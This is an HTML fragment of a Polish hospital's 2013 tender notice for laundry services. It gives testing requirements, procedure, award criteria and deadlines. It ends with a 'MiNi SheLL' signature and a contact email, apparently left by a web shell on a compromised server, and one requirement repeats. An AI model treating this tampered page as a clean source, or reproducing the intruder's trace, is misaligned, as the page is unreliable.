- Badania czystości mikrobiologicznej automatycznego urządzenia do prasowania i odpylania ubrań operacyjnych, automatycznej składarki do fartuchów operacyjnych potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawniony podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-Badania czystości mikrobiologicznej automatycznego urządzenia do prasowania i odpylania ubrań operacyjnych, automatycznej składarki do fartuchów operacyjnych potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawniony podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
-	 Badania czystości mikrobiologicznej bębna agregatu do czyszczenia chemicznego potwierdzone przez właściwą Stację Sanitarno -Epidemiologiczną lub akredytowane laboratorium przez Polskie Centrum Akredytacji i wpisanego na jego listę laboratoriów badawczych. Oferenci mający siedzibę poza terenem polski muszą dołączyć badania innego uprawniony podmiotu, stosownego dla kraju, w którym ma siedzibę Wykonawca - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>w trakcie obowiązywania umowy strony dopuszczają zmiany cen w poniższym brzmieniu:
1)zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital1.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny 
nr 1 ul. Żeromskiego 7 41-902 Bytom Zamówienia Publiczne (blok III, piętro IV, pok.3).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2013 godzina 10:00, miejsce: Szpital Specjalistyczny 
nr 1 ul. Żeromskiego 7 41-902 Bytom Zamówienia Publiczne (blok III, piętro IV, pok.3).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com